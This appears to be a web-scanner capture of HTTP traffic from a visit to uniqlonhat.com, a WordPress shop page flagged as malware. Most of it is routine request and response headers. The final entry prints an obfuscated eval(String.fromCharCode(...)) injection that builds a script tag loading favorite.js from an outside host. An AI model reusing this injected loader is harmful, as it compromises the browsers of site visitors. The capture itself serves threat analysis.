r3.o.lencr.org/
23.36.76.226200 OK 503 B IP 23.36.76.226:0
ASN #20940 Akamai International B.V.
Hash 3bbb845b153026fc5332dd4506585b57
3cad200fac28fd00f34ce6ef79373e661e188743
6035871c0de6ff2d120921461207cfa32bc286e1fe78849ce74815ffbb9ff950
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "6035871C0DE6FF2D120921461207CFA32BC286E1FE78849CE74815FFBB9FF950"
Last-Modified: Thu, 01 Dec 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5281
Expires: Sat, 03 Dec 2022 16:32:29 GMT
Date: Sat, 03 Dec 2022 15:04:28 GMT
Connection: keep-alive
ocsp.digicert.com/
93.184.220.29200 OK 471 B IP 93.184.220.29:0
Hash 67e9370f1bf3e4946a01f346eeae8966
aaab391d1134302d718de7a0d5edbedf884633e6
27a8654fb14db88d4b2bb3b45c1b197fc498cd94143d4a68687742fa48a41358
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 744
Cache-Control: max-age=157148
Content-Type: application/ocsp-response
Date: Sat, 03 Dec 2022 15:04:28 GMT
Etag: "638b2570-1d7"
Expires: Mon, 05 Dec 2022 10:43:36 GMT
Last-Modified: Sat, 03 Dec 2022 10:31:12 GMT
Server: ECS (ska/F715)
X-Cache: HIT
Content-Length: 471
firefox.settings.services.mozilla.com/v1/
34.102.187.140200 OK 939 B URL HTTP/2 firefox.settings.services.mozilla.com/v1/
IP 34.102.187.140:0
File type JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Hash 30db107dcf4380cef05efea409c2e6a3
96e6a306fbc07299aba64e5c14e2bfca35872fa9
b64051a4a8e346e3c72b2aef77f360a5736ab5e16711d8e0bae3876feaa15b6e
GET /v1/ HTTP/1.1
Host: firefox.settings.services.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
access-control-allow-origin: *
access-control-expose-headers: Retry-After, Content-Type, Backoff, Content-Length, Alert
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 939
via: 1.1 google
date: Sat, 03 Dec 2022 14:20:00 GMT
cache-control: public,max-age=3600
content-type: application/json
age: 2668
alt-svc: clear
X-Firefox-Spdy: h2
r3.o.lencr.org/
23.36.76.226200 OK 503 B IP 23.36.76.226:0
ASN #20940 Akamai International B.V.
Hash 55b4c61a1e99001307750e3647fe1102
7559f9f6770b7d3f45b723167062096312641e08
39f6bb64420bcfc8f0b010168fd35b67732984cd0698409f04d5ae40410422aa
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "39F6BB64420BCFC8F0B010168FD35B67732984CD0698409F04D5AE40410422AA"
Last-Modified: Thu, 01 Dec 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=19862
Expires: Sat, 03 Dec 2022 20:35:30 GMT
Date: Sat, 03 Dec 2022 15:04:28 GMT
Connection: keep-alive
content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2022-12-30-09-21-26.chain
34.160.144.191200 OK 5.3 kB URL HTTP/2 content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2022-12-30-09-21-26.chain
IP 34.160.144.191:0
File type PEM certificate\012- , ASCII text
Hash 9ebddc2b260d081ebbefee47c037cb28
492bad62a7ca6a74738921ef5ae6f0be5edebf39
74bbb7cba16f7d084a08a0907d47d7496e5c148f904707ec6950f8f6a61027e5
GET /chains/remote-settings.content-signature.mozilla.org-2022-12-30-09-21-26.chain HTTP/1.1
Host: content-signature-2.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
x-amz-id-2: SwROgGm+J1IDYro7Zw2qARzX0hGaIHxns4xH1L2iCBnXA7gymP/ztN0M+/CF1d+bVbPieYFqDu8=
x-amz-request-id: SERV41TPZD64QNWG
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
content-length: 5348
via: 1.1 google
date: Sat, 03 Dec 2022 14:47:09 GMT
age: 1039
last-modified: Thu, 10 Nov 2022 09:21:27 GMT
etag: "9ebddc2b260d081ebbefee47c037cb28"
content-type: binary/octet-stream
cache-control: public,max-age=3600
alt-svc: clear
X-Firefox-Spdy: h2
contile.services.mozilla.com/v1/tiles
34.117.237.239200 OK 12 B URL HTTP/2 contile.services.mozilla.com/v1/tiles
IP 34.117.237.239:0
File type JSON data\012- , ASCII text, with no line terminators
Hash 23e88fb7b99543fb33315b29b1fad9d6
a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
GET /v1/tiles HTTP/1.1
Host: contile.services.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
date: Sat, 03 Dec 2022 15:04:28 GMT
content-type: application/json
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2
firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US
34.102.187.140200 OK 329 B URL HTTP/2 firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US
IP 34.102.187.140:0
File type JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Hash 0333b0655111aa68de771adfcc4db243
63f295a144ac87a7c8e23417626724eeca68a7eb
60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1
Host: firefox.settings.services.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
access-control-allow-origin: *
access-control-expose-headers: Last-Modified, Retry-After, Cache-Control, Content-Type, Pragma, Backoff, ETag, Expires, Content-Length, Alert
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 329
via: 1.1 google
date: Sat, 03 Dec 2022 14:08:58 GMT
cache-control: public,max-age=3600
age: 3330
last-modified: Fri, 25 Mar 2022 17:45:46 GMT
etag: "1648230346554"
content-type: application/json
alt-svc: clear
X-Firefox-Spdy: h2
ocsp.digicert.com/
93.184.220.29200 OK 471 B IP 93.184.220.29:0
Hash a151c326c67e1abb747847c1427db76f
80885d30ef8ba867bf33c40b861976958a27493a
de2b573ee1c8af980e593352e0c331b2595f62bd4499300ace30821d20814760
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 737
Cache-Control: max-age=152079
Content-Type: application/ocsp-response
Date: Sat, 03 Dec 2022 15:04:29 GMT
Etag: "638b11ab-1d7"
Expires: Mon, 05 Dec 2022 09:19:08 GMT
Last-Modified: Sat, 03 Dec 2022 09:06:51 GMT
Server: ECS (ska/F715)
X-Cache: HIT
Content-Length: 471
fonts.googleapis.com/css?family=Raleway:400,300,200
142.250.74.106200 OK 546 B URL HTTP/1.1 fonts.googleapis.com/css?family=Raleway:400,300,200
IP 142.250.74.106:0
Hash ddf118ae02447b7636880117e64d9fcf
a3ca0d51e624d34282784e8c9ebb03f8f3ab83bb
f4574bde5acb6c5449eee55c5b779ca5bb601a679a3bce04d578d4b018a4f7d6
GET /css?family=Raleway:400,300,200 HTTP/1.1
Host: fonts.googleapis.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Origin: http://uniqlonhat.com
Connection: keep-alive
Referer: http://uniqlonhat.com/
HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Link: <http://fonts.gstatic.com>; rel=preconnect; crossorigin
Expires: Sat, 03 Dec 2022 15:04:29 GMT
Date: Sat, 03 Dec 2022 15:04:29 GMT
Cache-Control: private, max-age=86400
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin-allow-popups
Content-Encoding: gzip
Transfer-Encoding: chunked
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
fonts.googleapis.com/css?family=Ubuntu:400,300,300italic,400italic,500,500italic,700,700italic&subset=latin,cyrillic-ext,cyrillic,greek-ext,greek,latin-ext
142.250.74.106200 OK 821 B URL HTTP/1.1 fonts.googleapis.com/css?family=Ubuntu:400,300,300italic,400italic,500,500italic,700,700italic&subset=latin,cyrillic-ext,cyrillic,greek-ext,greek,latin-ext
IP 142.250.74.106:0
Hash fa68c0216205d4c62981bc5b1af28f9a
4270156f7e61b55a59fe97e65605b1536ac3c5a6
a04192006b140d1b2c78dabfe334c941d2b04ad8f54e3ae07c2e827c4885ac90
GET /css?family=Ubuntu:400,300,300italic,400italic,500,500italic,700,700italic&subset=latin,cyrillic-ext,cyrillic,greek-ext,greek,latin-ext HTTP/1.1
Host: fonts.googleapis.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Origin: http://uniqlonhat.com
Connection: keep-alive
Referer: http://uniqlonhat.com/
HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Link: <http://fonts.gstatic.com>; rel=preconnect; crossorigin
Expires: Sat, 03 Dec 2022 15:04:29 GMT
Date: Sat, 03 Dec 2022 15:04:29 GMT
Cache-Control: private, max-age=86400
Cross-Origin-Opener-Policy: same-origin-allow-popups
Cross-Origin-Resource-Policy: cross-origin
Content-Encoding: gzip
Transfer-Encoding: chunked
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
fonts.googleapis.com/css?family=Patrick+Hand:400&subset=latin,vietnamese,latin-ext
142.250.74.106200 OK 404 B URL HTTP/1.1 fonts.googleapis.com/css?family=Patrick+Hand:400&subset=latin,vietnamese,latin-ext
IP 142.250.74.106:0
Hash 7d356b475dcf13fbfa3211f6948deff2
5ef454d6c1d8c66c1552041c6621fa152ea9446e
9429d2048d641e3c7a938691748d5df36609f624efaf3d08aa2968764296348b
GET /css?family=Patrick+Hand:400&subset=latin,vietnamese,latin-ext HTTP/1.1
Host: fonts.googleapis.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Origin: http://uniqlonhat.com
Connection: keep-alive
Referer: http://uniqlonhat.com/
HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Link: <http://fonts.gstatic.com>; rel=preconnect; crossorigin
Expires: Sat, 03 Dec 2022 15:04:29 GMT
Date: Sat, 03 Dec 2022 15:04:29 GMT
Cache-Control: private, max-age=86400
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin-allow-popups
Content-Encoding: gzip
Transfer-Encoding: chunked
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
www.googleadservices.com/pagead/conversion.js
142.250.74.130200 OK 17 kB URL HTTP/1.1 www.googleadservices.com/pagead/conversion.js
IP 142.250.74.130:0
File type ASCII text, with very long lines (2772)
Hash 66d15569d62036ed6fe2267dfbf9058f
c8c197520baf682bceeb58a33fa8cf27e46fa87d
33845683646c35e8b24272efcc4f08fe61b8e3e529e2b6c9d955cfdfbf6c05e5
GET /pagead/conversion.js HTTP/1.1
Host: www.googleadservices.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/
HTTP/1.1 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
Timing-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Vary: Accept-Encoding
Date: Sat, 03 Dec 2022 15:04:29 GMT
Expires: Sat, 03 Dec 2022 15:04:29 GMT
Cache-Control: private, max-age=3600
Content-Type: text/javascript; charset=UTF-8
ETag: 16359567893097152046
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="f.txt"
Content-Encoding: gzip
Server: cafe
Content-Length: 17401
X-XSS-Protection: 0
push.services.mozilla.com/
54.70.239.215101 Switching Protocols 0 B URL HTTP/1.1 push.services.mozilla.com/
IP 54.70.239.215:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET / HTTP/1.1
Host: push.services.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: kh9fd+m5JhYrdPT1y9nF0Q==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket
HTTP/1.1 101 Switching Protocols
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: YZKjF7O/JG8DaKQ7MqQ7Y5lDG9I=
uniqlonhat.com/ao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933/
103.28.36.212200 OK 22 kB URL HTTP/1.1 uniqlonhat.com/ao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933/
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
File type HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, Unicode text, UTF-8 text, with very long lines (4571), with CRLF, LF line terminators
Hash d27daed8a6de12937bd63e0db054e1f6
f12a4388674176cb6853c30d17d1b05a304d5d61
40c5c41e34a0e84ef96095ef0b682f1725fcfa4bc2bea6b25eb25bf89eaa726e
Analyzer Verdict Alert fortinet Malware
GET /ao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933/ HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Connection: Keep-Alive
X-Powered-By: PHP/7.4.12
Set-Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu; expires=Tue, 30-Nov-2032 15:04:26 GMT; Max-Age=315360000; path=/; HttpOnly
Content-Type: text/html; charset=UTF-8
Link: <http://uniqlonhat.com/wp-json/>; rel="https://api.w.org/", <http://uniqlonhat.com/wp-json/wp/v2/posts/3792>; rel="alternate"; type="application/json", <http://uniqlonhat.com/?p=3792>; rel=shortlink
Transfer-Encoding: chunked
Content-Encoding: gzip
Vary: Accept-Encoding
Date: Sat, 03 Dec 2022 15:04:26 GMT
Server: LiteSpeed
cdnjs.cloudflare.com/ajax/libs/font-awesome/4.4.0/css/font-awesome.min.css
104.17.24.14200 OK 5.9 kB URL HTTP/1.1 cdnjs.cloudflare.com/ajax/libs/font-awesome/4.4.0/css/font-awesome.min.css
IP 104.17.24.14:0
File type ASCII text, with very long lines (26548)
Hash 051eaa0dfc588b4223ebe4941b87ed2a
88bf915aa4094c2bb2bbad91707ed5f0837835b6
743b4844a007f19665d2c121531a9117c84e2d92bb6f8abe77420e46c05e58ec
GET /ajax/libs/font-awesome/4.4.0/css/font-awesome.min.css HTTP/1.1
Host: cdnjs.cloudflare.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/
HTTP/1.1 200 OK
Date: Sat, 03 Dec 2022 15:04:29 GMT
Content-Type: text/css; charset=utf-8
Content-Length: 5936
Connection: keep-alive
Access-Control-Allow-Origin: *
Cache-Control: public, max-age=30672000
Content-Encoding: gzip
ETag: "5eb03e5f-6857"
Last-Modified: Mon, 04 May 2020 16:10:07 GMT
cf-cdnjs-via: cfworker/kv
Cross-Origin-Resource-Policy: cross-origin
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
CF-Cache-Status: HIT
Age: 1359207
Expires: Thu, 23 Nov 2023 15:04:29 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BThyOMWwGgPAw0ETkK5Bni0IYFU7MgUbnqG9UU9Nf2zYeRZSThIUCMD5uF%2Flyyx92%2BPobdn4mdjDJZvxjNM9xGi0Azbmb1a3jixqXCXinVZOiif8YNi0wHFR9ZVPc9D6hMemEeOT"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 773d31f0febfb51e-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
translate.google.com/translate_a/element.js?cb=googleTranslateElementInit
216.58.211.14301 Moved Permanently 0 B URL HTTP/1.1 translate.google.com/translate_a/element.js?cb=googleTranslateElementInit
IP 216.58.211.14:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /translate_a/element.js?cb=googleTranslateElementInit HTTP/1.1
Host: translate.google.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/
HTTP/1.1 301 Moved Permanently
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 03 Dec 2022 15:04:29 GMT
Location: https://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit
Cross-Origin-Opener-Policy: same-origin-allow-popups
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
ocsp.digicert.com/
93.184.220.29200 OK 278 B IP 93.184.220.29:0
Hash a96c48a3affad46a0b7f5b8178b926d3
cab43cf055876aa6e3a3e0563e9bc550a00f70da
f1bf5a7faea6b7ee9b5c8395188e4a5ba1840e1626e500803522c5950c472a68
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 665
Cache-Control: max-age=144483
Content-Type: application/ocsp-response
Date: Sat, 03 Dec 2022 15:04:29 GMT
Etag: "638af447-116"
Expires: Mon, 05 Dec 2022 07:12:32 GMT
Last-Modified: Sat, 03 Dec 2022 07:01:27 GMT
Server: ECS (ska/F715)
X-Cache: HIT
Content-Length: 278
uniqlonhat.com/wp-content/themes/eStore/style.css
103.28.36.212200 OK 8.4 kB URL HTTP/1.1 uniqlonhat.com/wp-content/themes/eStore/style.css
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
File type ASCII text, with very long lines (595)
Hash 4ab5a9edcbb9dd21b99300748ac6afab
27238d82bb5ecb7197ed276447811af47524378a
a6580ca5dc93567c2c65ea7f5edac1651f6ee65311b713b2b283196b1022e891
GET /wp-content/themes/eStore/style.css HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/ao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933/
Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu
HTTP/1.1 200 OK
Connection: Keep-Alive
Cache-Control: public, max-age=604800
Expires: Sat, 10 Dec 2022 15:04:27 GMT
Content-Type: text/css
Last-Modified: Thu, 26 Mar 2020 03:49:51 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 8436
Date: Sat, 03 Dec 2022 15:04:27 GMT
Server: LiteSpeed
ocsp.digicert.com/
93.184.220.29200 OK 278 B IP 93.184.220.29:0
Hash a96c48a3affad46a0b7f5b8178b926d3
cab43cf055876aa6e3a3e0563e9bc550a00f70da
f1bf5a7faea6b7ee9b5c8395188e4a5ba1840e1626e500803522c5950c472a68
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 665
Cache-Control: max-age=144483
Content-Type: application/ocsp-response
Date: Sat, 03 Dec 2022 15:04:29 GMT
Etag: "638af447-116"
Expires: Mon, 05 Dec 2022 07:12:32 GMT
Last-Modified: Sat, 03 Dec 2022 07:01:27 GMT
Server: ECS (ska/F715)
X-Cache: HIT
Content-Length: 278
ocsp.pki.goog/gts1c3
142.250.74.131200 OK 472 B IP 142.250.74.131:0
Hash 1f3a4f3edea56419c58836a0c80d5cea
1558a7ad0acc0c09cdf39ec92030f7ee5736e595
70aeda0cb136ac1add86931a338558b9f302576cd65537575d232fda623fe2f0
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sat, 03 Dec 2022 15:04:29 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
static.zotabox.com/%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2056,%2044,%2032,%2049,%2048,%2056,%2044,%2032,%2057,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2055,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2057,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%2097,%20118,%20111,%20114,%20105,%20116,%20101,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E